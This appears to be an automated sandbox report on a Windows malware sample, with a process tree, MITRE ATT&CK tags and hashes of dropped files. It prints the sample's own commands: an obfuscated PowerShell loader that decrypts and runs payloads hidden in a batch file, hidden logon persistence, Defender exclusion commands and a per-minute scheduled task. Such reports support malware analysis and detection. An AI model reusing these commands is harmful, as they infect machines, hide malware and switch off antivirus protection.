c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
- Drops file in System32 directory
PID:1096
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork1⤵PID:1124
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:1168 -
C:\Users\Admin\system.exeC:\Users\Admin\system.exe2⤵
- Executes dropped EXE
PID:4540
-
-
C:\Users\Admin\system.exeC:\Users\Admin\system.exe2⤵
- Executes dropped EXE
PID:948
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵PID:1192
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1240
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1268
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵PID:1276
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵PID:1412
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1464
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵PID:4100
-
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵PID:5012
-
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵PID:4344
-
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵PID:2756
-
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵PID:4928
-
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵PID:212
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1500
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵PID:1580
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵PID:1608
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵PID:1632
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵PID:1716
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1748
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1884
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1892
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1948
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵PID:1956
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵PID:2120
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2244
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵PID:2276
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2288
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵PID:2348
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵PID:2396
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵PID:2452
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2476
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2532
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2608
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵PID:3004
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵PID:3124
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3320 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\systeminformer.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zppN17iXtrCN9R2seJEth9hA/unISVpEyKgytiMsEXg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4HYls8iOlhSjNY1hAkSsQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jLbjH=New-Object System.IO.MemoryStream(,$param_var); $rbzqc=New-Object System.IO.MemoryStream; $LPpaN=New-Object System.IO.Compression.GZipStream($jLbjH, [IO.Compression.CompressionMode]::Decompress); $LPpaN.CopyTo($rbzqc); $LPpaN.Dispose(); $jLbjH.Dispose(); $rbzqc.Dispose(); $rbzqc.ToArray();}function execute_function($param_var,$param2_var){ $NeELi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $OenrY=$NeELi.EntryPoint; $OenrY.Invoke($null, $param2_var);}$rPKgK = 'C:\Users\Admin\AppData\Local\Temp\systeminformer.bat';$host.UI.RawUI.WindowTitle = $rPKgK;$pVvBN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($rPKgK).Split([Environment]::NewLine);foreach ($VGOfr in $pVvBN) { if ($VGOfr.StartsWith('vcAjailoeyOprdqWzxUu')) { $mEApY=$VGOfr.Substring(20); break; }}$payloads_var=[string[]]$mEApY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:4428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_454_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_454.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3020
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_454.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_454.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zppN17iXtrCN9R2seJEth9hA/unISVpEyKgytiMsEXg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4HYls8iOlhSjNY1hAkSsQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jLbjH=New-Object System.IO.MemoryStream(,$param_var); $rbzqc=New-Object System.IO.MemoryStream; $LPpaN=New-Object System.IO.Compression.GZipStream($jLbjH, [IO.Compression.CompressionMode]::Decompress); $LPpaN.CopyTo($rbzqc); $LPpaN.Dispose(); $jLbjH.Dispose(); $rbzqc.Dispose(); $rbzqc.ToArray();}function execute_function($param_var,$param2_var){ $NeELi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $OenrY=$NeELi.EntryPoint; $OenrY.Invoke($null, $param2_var);}$rPKgK = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_454.bat';$host.UI.RawUI.WindowTitle = $rPKgK;$pVvBN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($rPKgK).Split([Environment]::NewLine);foreach ($VGOfr in $pVvBN) { if ($VGOfr.StartsWith('vcAjailoeyOprdqWzxUu')) { $mEApY=$VGOfr.Substring(20); break; }}$payloads_var=[string[]]$mEApY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:4964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\system.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4780
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system" /tr "C:\Users\Admin\system.exe"7⤵
- Scheduled Task/Job: Scheduled Task
PID:1492
-
-
-
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /72⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3376
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵PID:4812
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:4652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4156
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵PID:4472
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
Filesize
50KB
MD52143b379fed61ab5450bab1a751798ce
SHA132f5b4e8d1387688ee5dec6b3cc6fd27b454f19e
SHA256a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81
SHA5120bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa
-
Filesize
2KB
MD5aeb24b5729d62e81a27174f46d431126
SHA1baa02ac3f99822d1915bac666450dc20727494bb
SHA256d2b2e09bffd835255b1fb57c2aa92e5c28c080eb033e1f042087d36a93393471
SHA512e62f6771339326a90f03b79f8a3321c4f00d66e5f228055f17b75d028895f80ce374bd0143ec971f55efa861b949ec672bfda9df7fb45444b17f3dbe479a5415
-
Filesize
1KB
MD50d4a279d2292b7b5d943e8839c4a5b67
SHA1e84d64f4579c7e4d326d7bccc8915e16ad4f22c2
SHA25625ec6032815b69f0bb2fbd4f018f8b3c87259daa89ed9f0ca871334f6d8e102f
SHA512cd0f7a367794b39624593199c01cb4886d7baa0a829b76395ab1890d587456f3fdc2ae481827a41571917e3f780d09d32b39d288d3755edcdd56597507a7d180
-
Filesize
1KB
MD5b70f376eb6b0944741c4086a001a49be
SHA11b5fc59b592d7d267d48db7c7714c7c1e55e37e3
SHA25682481965e29d9c6d4a2d14440e0e9300fcaa01f24bced067cf752f897d892117
SHA512434d5bfff2f7baad98d7d08a17abf77745a25f42ebe0f1ab11d8902ec2a8235435a678a107bedd8b4f3bedef8df8a5fb0d8172cd695562ed69e2ed7c4b52f9d1
-
Filesize
1KB
MD52ee07d41132442e33452cbac9e4beb76
SHA1201d7a8efd011a34678268110277982330b7a7b8
SHA2567c8a89c49b57811ebacdc1dfc0a5938f6f3e83758cb0de46c99487dc22b3a950
SHA512458bedecd5966392b1ac14050427864df2bffe28130be8180250e76781f142e10aeb9cc38eae31815f4ecb07e34b319d67dfbfdf4487aba6cbc4048c29ed2b7d
-
Filesize
1KB
MD5cf3f4df0e6140340cb5f4eed6c2ee5a6
SHA181b1f4c656cf5075b84983a1f341114694e3d56d
SHA2560d1a4ad17e72e14556fba8b42c3242022ee7972f2a60b07e6f61e0d68ba36f00
SHA512dc35a32862c84c1ab5006a98f6b3c69a29d5d3a285496afe73ab9c85582197aec0ef527b7bfe5c08597db08aa89a1ade59862b3889923679d3514e9e956e774d
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
408KB
MD534d172bddcf176f4a3c85f2b8083850c
SHA16e4fd033d2ed62b464db43b6af1f5bb0e9283a46
SHA256ecb640f4a29fea8d3fb020aa2b41bdc446703c4b1ede6b5c72621229b270bf42
SHA512c52171f7c68902cfe5da18b2a76a59c5a27f1cec92ee330f57f18f9b257079b49d5ff445f4251ad13ba5886e274d5286e062c39cac3a77bbef71909502ab3516
-
Filesize
124B
MD5d52bae4c19075e66287edaaf3b31b708
SHA16b6b4e56f9f9c4d58350e67bb195c01bfb78f725
SHA2566502efb861197052f225894f547b1631e5dec211a2b9c8fe6a1b8e5c836fed53
SHA512c1136dca6955077d39adfc6aa90f19a8ad8e990bda56f00b8c1347af2173abc2e607a614ce4f65242db9d4c376a0312ce9b433d38481fe7862b7155228bae7c4
-
Filesize
775B
MD55f8c70cab61eefb1769efa7cedd59c5a
SHA139e81433bdc7c8413acd94cfd5edb91afcec279a
SHA25695fd703952a427a8b48fe0afa69a9f2f3bebb4f849d33f2b81bdd4512dcbc110
SHA512ccdc5640602829379362d97d37871937df7d4cf66394e99e780ec134f1f72d2c1c3b8a7f343036e895e29dabe2dbb422f0249a2710817e1a586de64f5b765b7b
-
Filesize
435KB
MD5f7722b62b4014e0c50adfa9d60cafa1c
SHA1f31c17e0453f27be85730e316840f11522ddec3e
SHA256ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA5127fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4